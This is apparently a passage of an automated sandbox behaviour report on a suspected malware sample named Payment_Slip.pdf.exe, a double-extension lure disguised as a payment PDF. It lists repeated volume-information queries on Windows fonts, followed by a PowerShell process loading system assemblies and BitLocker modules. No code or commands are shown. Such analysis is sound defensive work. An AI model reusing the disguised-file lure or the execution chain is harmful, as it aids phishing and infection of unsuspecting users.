Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
